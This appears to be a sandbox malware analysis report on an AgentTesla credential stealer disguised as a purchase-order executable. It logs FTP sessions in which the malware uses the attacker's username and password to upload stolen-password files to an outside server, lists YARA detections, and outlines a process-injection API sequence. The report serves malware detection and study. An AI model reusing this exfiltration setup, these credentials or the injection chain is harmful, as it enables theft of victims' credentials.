                                                        2024-10-07 07:13:52 UTC8000INData Raw: 39 3f 25 16 f0 f1 87 af bd 57 6b 0a 7b ab e3 32 f9 7d b7 11 32 e0 34 a6 e1 3b 92 ad f3 9a 37 71 4a 3c 2a aa 03 74 61 08 ae a7 61 ad 14 b2 b5 41 2f 7d ba 39 5f 61 38 b2 38 20 0c 3d e8 34 f8 b8 a4 fc 00 4a 8b d6 d8 b8 4b 02 a4 1d c9 c0 63 be e4 12 fa 8e 4c 23 bf ba 8c 1c 82 61 6f 80 a6 4c 62 72 6a 50 7a 6a cc 06 5d 81 5b 66 ea 82 4d b3 4e b6 14 63 7e 27 84 69 7e 6d 71 7e ef 43 43 e3 17 af b1 e8 c9 95 2f 63 9d fb 2c bb 70 9d 2d 38 b3 4b 07 e2 7a ae 89 9e d4 fc 7b 74 e2 18 68 af 43 e0 5e a5 b4 67 cc 36 c5 08 03 35 ca 78 2e cf f4 9e 08 1a a4 09 41 95 18 4d 12 45 02 21 12 5e 0f ec 3e dd 52 22 1d a4 2f ef 31 dc 75 4a dc fa 01 f4 13 ef 7b 44 20 f6 22 c4 f4 d1 21 68 31 a4 ca 13 6a fe 57 84 2e 56 51 77 6b 37 04 c3 01 06 3e a7 70 93 67 d5 44 1e 93 43 5e de 49 1d 46
                                                        Data Ascii: 9?%Wk{2}24;7qJ<*taaA/}9_a88 =4JKcL#aoLbrjPzj][fMNc~'i~mq~CC/c,p-8Kz{thC^g65x.AME!^>R"/1uJ{D "!h1jW.VQwk7>pgDC^IF
                                                        2024-10-07 07:13:52 UTC8000INData Raw: 66 08 68 55 4d 46 f7 30 7b a4 16 b2 79 cf 6a da 1a 7f db 27 1a 78 12 c7 e5 25 80 3c c6 41 ac 37 f5 94 c5 a0 aa 4b 4b 75 84 19 e6 91 96 97 79 c8 60 35 4e 4b fb 2f b1 db 49 bf 79 45 c5 38 f0 3f fb d4 33 38 cc 45 5e 63 17 01 5b 0c 5d 70 0c 02 e2 2e ef 42 6d 5d 18 76 19 4e 1a e8 8e fa 07 fa b3 a5 f4 c4 a4 66 42 ca e1 8a cf b2 94 a5 bc 7d 22 5b ff c8 00 c6 5e 8f a6 85 07 13 68 40 24 00 a9 5b 0a 4b 38 e3 d8 8f aa 7f 28 c9 a0 47 fd 26 02 92 36 53 76 05 42 37 a7 c5 90 1f a6 56 74 51 d3 dc 3c cf a4 44 45 e1 28 95 89 93 7e 45 60 28 ae 3f 2d f2 f6 a0 a8 16 90 48 1d d6 48 c8 37 d1 0c 82 83 3c 0f a7 42 b3 d6 52 1a d7 ef 7f 96 96 e6 b5 cb ba fa ef 32 aa 89 98 fb 29 5d 36 3d 53 2b 5c 2c 74 fa a9 6d 0d 2b 1e 82 2b 76 6b a9 c0 2b dd de 05 64 b2 01 e7 17 fe e0 1c a6 8d 23
                                                        Data Ascii: fhUMF0{yj'x%<A7KKuy`5NK/IyE8?38E^c[]p.Bm]vNfB}"[^h@$[K8(G&6SvB7VtQ<DE(~E`(?-HH7<BR2)]6=S+\,tm++vk+d#
                                                        2024-10-07 07:13:52 UTC8000INData Raw: d9 ef 29 17 70 2f de ea a8 62 55 91 05 a1 02 01 b8 06 cb e5 74 8d fb 98 28 15 69 96 4e 71 99 5c 8f 46 16 67 98 0a 8f 58 7d 94 e9 96 28 a2 11 17 58 bd 19 42 81 f4 51 82 00 8a f8 39 2e 9f 72 6d ff 3f 7a 0f 5c 79 2c 88 21 7d bf 38 61 43 81 19 a7 c8 d4 05 7a 93 b1 04 1b c4 16 04 2c bc 3c 35 a2 5f 90 4c 2e a2 75 4c ad 19 26 29 3c 0a 8f 4b e2 8f 9b e8 b4 92 d3 28 7b e7 c8 67 c2 f3 4f 3e 18 ee d8 fe 2f 4e 68 d3 e5 ec 50 02 d5 af 86 59 39 e5 f8 ad b9 20 48 37 bb 09 3c bb 89 e5 c0 de ac fc 38 76 f1 ae db 15 36 8a 88 db a2 f4 35 b6 57 a8 2e 5a 6d 7c b5 b5 ac 3d 51 26 ee 55 ab c7 ff 04 e3 0b 9e 53 f1 6c 96 78 ce 26 47 0c dc 6c 00 8f 1b c9 a1 61 14 41 88 16 46 f4 7b 31 1f 05 8a 88 0c a8 ff ac c0 2b 3f e5 f4 ae e2 47 3b d6 6c df a6 5e 1d f0 0e 28 be e3 cf 40 e5 78 0c
                                                        Data Ascii: )p/bUt(iNq\FgX}(XBQ9.rm?z\y,!}8aCz,<5_L.uL&)<K({gO>/NhPY9 H7<8v65W.Zm|=Q&USlx&GlaAF{1+?G;l^(@x
                                                        2024-10-07 07:13:52 UTC8000INData Raw: 8f 2f 95 46 49 be 29 26 1a 22 80 12 05 0d 98 c3 9c e9 06 93 c6 6b 97 05 5f 3e e6 2f e2 a4 aa e1 62 d4 0f 19 e4 ae 70 9a d4 46 64 75 ef 59 07 61 28 f4 76 0c 73 68 f2 a6 ef 98 0b b1 23 87 f3 5f a7 bd 00 71 8b e3 42 9f 0d 0c 3b b8 5c d0 9c b0 cb 5d d3 9f 84 ac 99 eb f6 50 08 5c ad 34 19 9d ec a9 75 ee c3 f8 d9 eb 7e c7 da ba bd 26 29 54 d7 5a 8f 96 0d b5 ec 0a ad 0a 5f 4d 24 f9 fa 08 84 b2 41 25 03 c3 76 00 a9 41 ed c6 47 bc 8c 8a 96 91 34 34 84 72 05 8d 5f d4 c9 16 08 50 2a 88 21 83 e9 e4 64 bf 06 13 30 09 14 d9 d0 fd 92 70 86 96 b9 44 6c 8a 66 f9 14 bb 25 ba bc 99 85 76 e0 49 b4 37 16 88 a8 1d a5 f1 dc c9 6f aa 5f 7f 11 9d d8 2d 58 12 f8 34 b2 f7 6f eb 0d 51 a7 85 56 26 a9 75 22 61 10 a2 3a ce 61 82 32 21 7c 1d c8 4e 9d 1f 0d 20 6f b4 20 06 77 fd be 2a d9
                                                        Data Ascii: /FI)&"k_>/bpFduYa(vsh#_qB;\]P\4u~&)TZ_M$A%vAG44r_P*!d0pDlf%vI7o_-X4oQV&u"a:a2!|N o w*


                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                        Oct 7, 2024 09:13:36.050350904 CEST21497315.2.84.236192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 10:13. Server port: 21.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                        Oct 7, 2024 09:13:36.050604105 CEST4973121192.168.2.45.2.84.236USER fgghv@alternatifplastik.com
                                                        Oct 7, 2024 09:13:36.309659004 CEST21497315.2.84.236192.168.2.4331 User fgghv@alternatifplastik.com OK. Password required
                                                        Oct 7, 2024 09:13:36.309820890 CEST4973121192.168.2.45.2.84.236PASS Fineboy777@
                                                        Oct 7, 2024 09:13:36.663338900 CEST21497315.2.84.236192.168.2.4230 OK. Current restricted directory is /
                                                        Oct 7, 2024 09:13:36.922656059 CEST21497315.2.84.236192.168.2.4504 Unknown command
                                                        Oct 7, 2024 09:13:36.922807932 CEST4973121192.168.2.45.2.84.236PWD
                                                        Oct 7, 2024 09:13:37.181900978 CEST21497315.2.84.236192.168.2.4257 "/" is your current location
                                                        Oct 7, 2024 09:13:37.182140112 CEST4973121192.168.2.45.2.84.236TYPE I
                                                        Oct 7, 2024 09:13:37.441587925 CEST21497315.2.84.236192.168.2.4200 TYPE is now 8-bit binary
                                                        Oct 7, 2024 09:13:37.441781998 CEST4973121192.168.2.45.2.84.236PASV
                                                        Oct 7, 2024 09:13:37.740680933 CEST21497315.2.84.236192.168.2.4227 Entering Passive Mode (5,2,84,236,240,129)
                                                        Oct 7, 2024 09:13:37.746922016 CEST4973121192.168.2.45.2.84.236STOR PW_user-377142_2024_10_07_03_13_34.html
                                                        Oct 7, 2024 09:13:38.457134962 CEST21497315.2.84.236192.168.2.4150 Accepted data connection
                                                        Oct 7, 2024 09:13:38.716300011 CEST21497315.2.84.236192.168.2.4226-File successfully transferred
                                                        226-File successfully transferred226 0.259 seconds (measured here), 1.20 Kbytes per second
                                                        Oct 7, 2024 09:13:47.841573000 CEST21497355.2.84.236192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 10:13. Server port: 21.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                        Oct 7, 2024 09:13:47.841837883 CEST4973521192.168.2.45.2.84.236USER fgghv@alternatifplastik.com
                                                        Oct 7, 2024 09:13:48.387826920 CEST21497355.2.84.236192.168.2.4331 User fgghv@alternatifplastik.com OK. Password required
                                                        Oct 7, 2024 09:13:48.388324022 CEST4973521192.168.2.45.2.84.236PASS Fineboy777@
                                                        Oct 7, 2024 09:13:48.388577938 CEST21497355.2.84.236192.168.2.4331 User fgghv@alternatifplastik.com OK. Password required
                                                        Oct 7, 2024 09:13:48.598280907 CEST21497355.2.84.236192.168.2.4331 User fgghv@alternatifplastik.com OK. Password required
                                                        Oct 7, 2024 09:13:48.880084038 CEST21497355.2.84.236192.168.2.4230 OK. Current restricted directory is /
                                                        Oct 7, 2024 09:13:49.144174099 CEST21497355.2.84.236192.168.2.4504 Unknown command
                                                        Oct 7, 2024 09:13:49.144337893 CEST4973521192.168.2.45.2.84.236PWD
                                                        Oct 7, 2024 09:13:49.408490896 CEST21497355.2.84.236192.168.2.4257 "/" is your current location
                                                        Oct 7, 2024 09:13:49.408658981 CEST4973521192.168.2.45.2.84.236TYPE I
                                                        Oct 7, 2024 09:13:49.672302961 CEST21497355.2.84.236192.168.2.4200 TYPE is now 8-bit binary
                                                        Oct 7, 2024 09:13:49.672904015 CEST4973521192.168.2.45.2.84.236PASV
                                                        Oct 7, 2024 09:13:49.936832905 CEST21497355.2.84.236192.168.2.4227 Entering Passive Mode (5,2,84,236,195,83)
                                                        Oct 7, 2024 09:13:49.942456961 CEST4973521192.168.2.45.2.84.236STOR PW_user-377142_2024_10_07_03_13_46.html
                                                        Oct 7, 2024 09:13:50.650012016 CEST21497355.2.84.236192.168.2.4150 Accepted data connection
                                                        Oct 7, 2024 09:13:50.931509972 CEST21497355.2.84.236192.168.2.4226-File successfully transferred
                                                        226-File successfully transferred226 0.267 seconds (measured here), 1.17 Kbytes per second
                                                        Oct 7, 2024 09:13:55.899801016 CEST21497435.2.84.236192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 10:13. Server port: 21.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                        Oct 7, 2024 09:13:55.900016069 CEST4974321192.168.2.45.2.84.236USER fgghv@alternatifplastik.com
                                                        Oct 7, 2024 09:13:56.160398006 CEST21497435.2.84.236192.168.2.4331 User fgghv@alternatifplastik.com OK. Password required
                                                        Oct 7, 2024 09:13:56.161016941 CEST4974321192.168.2.45.2.84.236PASS Fineboy777@
                                                        Oct 7, 2024 09:13:56.451302052 CEST21497435.2.84.236192.168.2.4230 OK. Current restricted directory is /
                                                        Oct 7, 2024 09:13:56.747598886 CEST21497435.2.84.236192.168.2.4504 Unknown command
                                                        Oct 7, 2024 09:13:56.747751951 CEST4974321192.168.2.45.2.84.236PWD
                                                        Oct 7, 2024 09:13:57.007870913 CEST21497435.2.84.236192.168.2.4257 "/" is your current location
                                                        Oct 7, 2024 09:13:57.008033037 CEST4974321192.168.2.45.2.84.236TYPE I
                                                        Oct 7, 2024 09:13:57.268066883 CEST21497435.2.84.236192.168.2.4200 TYPE is now 8-bit binary
                                                        Oct 7, 2024 09:13:57.268212080 CEST4974321192.168.2.45.2.84.236PASV
                                                        Oct 7, 2024 09:13:57.529722929 CEST21497435.2.84.236192.168.2.4227 Entering Passive Mode (5,2,84,236,193,232)
                                                        Oct 7, 2024 09:13:57.535391092 CEST4974321192.168.2.45.2.84.236STOR PW_user-377142_2024_10_07_03_13_54.html
                                                        Oct 7, 2024 09:13:58.222192049 CEST21497435.2.84.236192.168.2.4150 Accepted data connection
                                                        Oct 7, 2024 09:13:58.482342005 CEST21497435.2.84.236192.168.2.4226-File successfully transferred
                                                        226-File successfully transferred226 0.260 seconds (measured here), 1.20 Kbytes per second

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:03:13:29
                                                        Start date:07/10/2024
                                                        Path:C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe"
                                                        Imagebase:0x100000
                                                        File size:2'945'024 bytes
                                                        MD5 hash:68B39CED0840D43E3A03E2F92C268C72
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1748074888.0000000005A60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:03:13:33
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0xef0000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1857971492.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1857971492.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:03:13:42
                                                        Start date:07/10/2024
                                                        Path:C:\Users\user\AppData\Roaming\Avycqjqvmh.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\Avycqjqvmh.exe"
                                                        Imagebase:0x900000
                                                        File size:2'945'024 bytes
                                                        MD5 hash:68B39CED0840D43E3A03E2F92C268C72
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.1856237995.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 63%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:03:13:45
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0xd0000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1937354915.000000000243C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1937354915.000000000243C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:03:13:50
                                                        Start date:07/10/2024
                                                        Path:C:\Users\user\AppData\Roaming\Avycqjqvmh.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\Avycqjqvmh.exe"
                                                        Imagebase:0x6b0000
                                                        File size:2'945'024 bytes
                                                        MD5 hash:68B39CED0840D43E3A03E2F92C268C72
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1966327299.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:03:13:53
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0xbe0000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2951059742.0000000003087000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:10.5%
                                                          Dynamic/Decrypted Code Coverage:91.5%
                                                          Signature Coverage:24.5%
                                                          Total number of Nodes:106
                                                          Total number of Limit Nodes:9
                                                          execution_graph 55494 5b44c20 55495 5b44c6f NtProtectVirtualMemory 55494->55495 55497 5b44ce7 55495->55497 55519 5b45880 55520 5b458c9 Wow64SetThreadContext 55519->55520 55522 5b45941 55520->55522 55539 d41890 55540 d4189b 55539->55540 55541 d418d5 55540->55541 55544 5b577ad 55540->55544 55549 5b5718c 55540->55549 55545 5b577b7 55544->55545 55554 59cc568 55545->55554 55559 59cc559 55545->55559 55546 5b577f5 55550 5b57196 55549->55550 55575 5b48298 55550->55575 55582 5b48289 55550->55582 55551 5b571d4 55555 59cc57d 55554->55555 55565 59cc598 55555->55565 55570 59cc5a8 55555->55570 55556 59cc593 55556->55546 55560 59cc567 55559->55560 55562 59cc4d5 55559->55562 55563 59cc598 2 API calls 55560->55563 55564 59cc5a8 2 API calls 55560->55564 55561 59cc593 55561->55546 55562->55546 55563->55561 55564->55561 55567 59cc5a8 55565->55567 55566 59cc706 55566->55556 55567->55566 55568 5b46830 VirtualProtect 55567->55568 55569 5b46838 VirtualProtect 55567->55569 55568->55567 55569->55567 55572 59cc5d2 55570->55572 55571 59cc706 55571->55556 55572->55571 55573 5b46830 VirtualProtect 55572->55573 55574 5b46838 VirtualProtect 55572->55574 55573->55572 55574->55572 55576 5b482ad 55575->55576 55589 5b4840e 55576->55589 55594 5b4877b 55576->55594 55599 5b482c8 55576->55599 55604 5b482d8 55576->55604 55577 5b482c3 55577->55551 55583 5b48298 55582->55583 55585 5b4840e 2 API calls 55583->55585 55586 5b482d8 2 API calls 55583->55586 55587 5b482c8 2 API calls 55583->55587 55588 5b4877b 2 API calls 55583->55588 55584 5b482c3 55584->55551 55585->55584 55586->55584 55587->55584 55588->55584 55590 5b48414 55589->55590 55591 5b4843a 55590->55591 55592 5b46830 VirtualProtect 55590->55592 55593 5b46838 VirtualProtect 55590->55593 55591->55577 55592->55590 55593->55590 55596 5b48357 55594->55596 55595 5b48369 55595->55577 55596->55595 55597 5b46830 VirtualProtect 55596->55597 55598 5b46838 VirtualProtect 55596->55598 55597->55596 55598->55596 55601 5b482d8 55599->55601 55600 5b48369 55600->55577 55601->55600 55602 5b46830 VirtualProtect 55601->55602 55603 5b46838 VirtualProtect 55601->55603 55602->55601 55603->55601 55606 5b48305 55604->55606 55605 5b48369 55605->55577 55606->55605 55607 5b46830 VirtualProtect 55606->55607 55608 5b46838 VirtualProtect 55606->55608 55607->55606 55608->55606 55609 5b45de0 55610 5b45e24 VirtualAllocEx 55609->55610 55612 5b45e9c 55610->55612 55613 5b46560 55614 5b465a9 NtResumeThread 55613->55614 55616 5b46600 55614->55616 55621 5b45f40 55622 5b45f8c WriteProcessMemory 55621->55622 55624 5b46025 55622->55624 55498 98d030 55499 98d048 55498->55499 55500 98d0a3 55499->55500 55502 5bbde70 55499->55502 55503 5bbdec9 55502->55503 55506 5bbe400 55503->55506 55504 5bbdefe 55507 5bbe42d 55506->55507 55510 5bbe5c3 55507->55510 55511 5bbd2a8 55507->55511 55510->55504 55513 5bbd2cf 55511->55513 55515 5bbd788 55513->55515 55516 5bbd7d1 VirtualProtect 55515->55516 55518 5bbd38c 55516->55518 55518->55504 55617 5bbe950 55618 5bbe994 VirtualAlloc 55617->55618 55620 5bbea01 55618->55620 55523 d491e8 55524 d49205 55523->55524 55525 d49215 55524->55525 55529 5bb7d18 55524->55529 55533 5bb41e2 55524->55533 55536 5bb517c 55524->55536 55530 5bb7d37 55529->55530 55532 5bbd2a8 VirtualProtect 55530->55532 55531 5bb7d5b 55532->55531 55535 5bbd2a8 VirtualProtect 55533->55535 55534 5bb01d9 55535->55534 55538 5bbd2a8 VirtualProtect 55536->55538 55537 5bb01d9 55537->55525 55538->55537 55625 5b454c8 55627 5b45548 CreateProcessA 55625->55627 55628 5b45744 55627->55628
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                          • API String ID: 0-312445597
                                                          • Opcode ID: 8b3c27a589edaea19c0e3cc4d7dc81b76311399e0fbf3987986d7ec663353ea0
                                                          • Instruction ID: 29a80cbc5957428f7c1cb62378f32bfa22677a3ff93d66047874714de892c9cb
                                                          • Opcode Fuzzy Hash: 8b3c27a589edaea19c0e3cc4d7dc81b76311399e0fbf3987986d7ec663353ea0
                                                          • Instruction Fuzzy Hash: D8B20934A002188FDB18DFA4C894BADBBB6FF48710F158599E905AB3A5DB70ED85CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                          • API String ID: 0-2546334966
